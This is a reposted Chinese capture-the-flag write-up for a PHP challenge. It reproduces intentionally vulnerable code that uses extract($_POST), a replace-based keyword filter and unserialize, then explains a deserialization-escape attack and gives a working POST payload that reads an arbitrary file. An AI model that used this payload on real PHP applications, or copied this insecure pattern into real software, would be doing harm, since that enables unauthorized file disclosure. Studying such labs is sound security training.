标签:function img serialize 安洵 SESSION file 序列化
<?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SESSION); } $_SESSION["user"] = 'guest'; $_SESSION['function'] = $function; extract($_POST); if(!$function){ echo '<a href="index.php?f=highlight_file">source_code</a>'; } if(!$_GET['img_path']){ $_SESSION['img'] = base64_encode('guest_img.png'); }else{ $_SESSION['img'] = sha1(base64_encode($_GET['img_path'])); } $serialize_info = filter(serialize($_SESSION)); if($function == 'highlight_file'){ highlight_file('index.php'); }else if($function == 'phpinfo'){ eval('phpinfo();'); //maybe you can find something in here! }else if($function == 'show_image'){ $userinfo = unserialize($serialize_info); echo file_get_contents(base64_decode($userinfo['img'])); }
首先是extract($_POST); ,因此可以实现变量覆盖。
而$_SESSION['img']可以当作一个数组来覆盖,(但是注意之前的值就没了)
注意filter,黑名单里面不是退出,而是替换为其他长度,结合这题的序列化,很明显是一道反序列化逃逸
至于原理也没啥好讲的,拼拼凑凑即可
payload:post输入数据
function=show_image&_SESSION[a]=phpphpphpflagflag&_SESSION[b]=a";s:1:"c";s:1:"c";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}
标签:function,img,serialize,安洵,SESSION,file,序列化 来源: https://www.cnblogs.com/aninock/p/15627208.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。